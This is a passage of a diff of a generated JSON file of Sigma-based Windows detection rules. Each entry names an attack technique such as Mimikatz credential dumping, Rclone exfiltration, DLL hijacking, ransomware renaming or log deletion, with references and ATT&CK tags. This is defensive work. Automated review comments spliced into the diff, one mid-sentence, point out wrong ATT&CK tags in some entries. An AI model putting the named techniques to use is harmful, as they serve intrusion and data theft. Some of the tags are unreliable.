"https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + 
"tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects" + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_writing_local_admin_share.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" ], "tags": [ "attack.lateral_movement", - "attack.t1047" + "attack.t1546.002" ] }, - "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "value": "Wmiexec Default Output File" + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share" + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/04/27", + "falsepositive": [ + "The installation of new screen savers." 
+ ], + "filename": "file_event_win_new_src_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event" + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_crackmapexec_patterns.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns" + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": 
"654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive" + }, + { + "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_create_non_existent_dlls.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", 
@@ -25019,103 +27118,178 @@ "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, { - "description": "Detects file writes of WMI script event consumer", + "description": "Detects programs on a Windows system that should not write scripts to disk", "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", - "falsepositive": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" - ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ] - }, - "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", - "value": "WMI Persistence - Script Event Consumer File Write" - }, - { - "description": "Detects creation of template files for Microsoft Office from outside Office", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/06/02", - "falsepositive": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" - ], - "filename": "file_event_win_word_template_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", - "value": "Office Template Creation" - }, - { - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
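Review bot: The ATT&CK tags on two of the entries added in this hunk contradict their own descriptions and references: `"New Shim Database Created in the Default Directory"` describes Application Shimming and cites the T1546.011 atomic test, yet is tagged `"attack.t1547.009"` (Shortcut Modification), and `"Writing Local Admin Share"` cites the T1021.002 atomic test but carries `"attack.t1546.002"` (Screensaver) under `attack.lateral_movement`. If the galaxy is generated verbatim from the Sigma YAML these are upstream tag errors, but analysts pivoting from a MISP event to ATT&CK will consume them as-is, so the expected values are `"attack.t1546.011"` and `"attack.t1021.002"` respectively and the generator or upstream rule should be corrected before this snapshot is published. The `"filename": "file_event_win_new_src_file.yml"` (src vs SCR), the `"Aversaries"` typo in the admin-share description and the non-URL `"PT ESC rule and personal experience"` entry in `refs` are also copied through and are better fixed at the source than in the generated file.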
Which could be indicative of UEFI based persistence method", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/18", - "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" - ], - "filename": "file_event_win_wpbbin_persistence.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ] - }, - "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "value": "UEFI Persistence Via Wpbbin - FileCreation" - }, - { - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_writing_local_admin_share.yml", + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script" + }, + { + "description": "Detects the creation of 
an file in user Word Startup", + "meta": { + "author": "frack113", + "creation_date": "2022/06/05", + "falsepositive": [ + "Addition of legitimate plugins" + ], + "filename": "file_event_win_susp_winword_startup.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1546.002" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "value": "Writing Local Admin Share" + "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "value": "Creation In User Word Startup Folder" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback 
Backdoor - File" + }, + { + "description": "Detects Rclone config file being created", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "filename": "file_event_win_rclone_exec_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation" + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dll_sideloading_space_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path" + }, + { + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2021/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_task_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1053" + ] + }, + "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "value": "Suspicious Scheduled Task Write to System32 Tasks" + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Backup software" + ], + "filename": "file_rename_win_ransomware.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension" }, { "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", 
@@ -25140,1914 +27314,452 @@ "value": "Rename Common File to DLL File" }, { - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", "meta": { - "author": "frack113", - "creation_date": "2022/07/16", + "author": "Tim Rauch", + "creation_date": "2022/09/16", "falsepositive": [ - "Backup software" + "During uninstallation of the IIS service", + "During log rotation" ], - "filename": "file_rename_win_ransomware.yml", + "filename": "file_delete_win_webserver_access_logs_deleted.yml", "level": "medium", - "logsource.category": "file_rename", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted" + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitime usage" + ], + "filename": "file_delete_win_delete_backup_file.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + 
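Review bot: Several `refs` entries added in this hunk are not URLs — `"Internal Research"` on `"Suspicious Scheduled Task Write to System32 Tasks"` and `"Malware Sandbox https://app.any.run/..."` on `"Creation In User Word Startup Folder"` — while most other refs in the cluster are bare links, so a consumer that renders or dereferences `refs` will get a broken item; the generator should either drop non-URL `references` from the Sigma YAML or strip the free-text prefix to leave `"https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/"`. The same Word Startup entry is tagged `"attack.resource_development"` / `"attack.t1587.001"` (Develop Capabilities: Malware) although its description is about a file written to the user's Word Startup folder, which looks like an Office persistence location rather than capability development, so the mapping should be checked against upstream before this snapshot is relied on. This hunk also removes the `WMI Persistence - Script Event Consumer File Write`, `Office Template Creation` and `UEFI Persistence Via Wpbbin - FileCreation` entries at this position; if the regeneration merely reorders the file they should reappear elsewhere in the diff, which is worth confirming so the rule count does not silently drop.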
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" ], "tags": [ "attack.impact", - "attack.t1486" + "attack.t1490" ] }, - "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "value": "Suspicious Appended Extension" + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files" }, { - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", "meta": { - "author": "Den Iuzvyk", - "creation_date": "2020/07/15", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", "falsepositive": [ - "Unknown" + "Legitime usage of SDelete" ], - "filename": "image_load_abusing_azure_browser_sso.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "level": "medium", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + 
"https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1070.004" ] }, - "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "value": "Abusing Azure Browser SSO" + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion" }, { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "description": "Deletion of log files is a known anti-forensic technique", "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/09/12", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ "Unknown" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "filename": "file_delete_win_delete_appli_log.yml", "level": "low", - "logsource.category": "image_load", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.004" ] }, - "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", - "value": "Alternate PowerShell Hosts - Image" + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application" }, { - "description": 
"Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_prefetch.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion" + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", "meta": { "author": "Bhabesh Raj", - "creation_date": "2022/08/02", + "creation_date": "2021/07/01", "falsepositive": [ - "Very unlikely" + "Unknown" ], - "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "value": "Microsoft Defender Loading DLL from Nondefault Path" - }, - { - "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_foggyweb_nobelium.yml", - "level": 
"critical", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587" - ] - }, - "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "value": "FoggyWeb Backdoor DLL Loading" - }, - { - "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", - "meta": { - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "creation_date": "2019/11/14", - "falsepositive": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "filename": "image_load_in_memory_powershell.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/p3nt4/PowerShdll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" - ], - "tags": [ - "attack.t1059.001", - "attack.execution" - ] - }, - "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "value": "In-memory PowerShell" - }, - { - "description": "Detects certain DLL loads when Mimikatz gets executed", - "meta": { - "author": "sigma", - "creation_date": "2017/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_mimikatz_inmemory_detection.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" - ], - "tags": [ - 
"attack.s0002", - "attack.t1003", - "attack.lateral_movement", - "attack.credential_access", - "car.2019-04-004" - ] - }, - "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", - "value": "Mimikatz In-Memory" - }, - { - "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", - "meta": { - "author": "Greg (rule)", - "creation_date": "2022/06/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_msdt_sdiageng.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" - ] - }, - "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "value": "MSDT.exe Loading Diagnostic Library" - }, - { - "description": "Detects processes loading modules related to PCRE.NET package", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_pcre_net_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "value": "PCRE.NET Package Image Load" - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/05", - "falsepositive": [ - "Very 
unlikely" - ], - "filename": "image_load_pingback_backdoor.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ] - }, - "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "value": "Pingback Backdoor - Image" - }, - { - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1555200155351228419", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" - ] - }, - "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", - "value": "Rundll32 Loading Renamed Comsvcs DLL" - }, - { - "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/09/02", - "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" - ], - "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", - "level": 
"medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "value": "WMI Script Host Process Image Loaded" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" - ], - "filename": "image_load_side_load_antivirus.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "value": "Antivirus Software DLL Sideloading" - }, - { - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "filename": "image_load_side_load_dbgcore_dll.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - 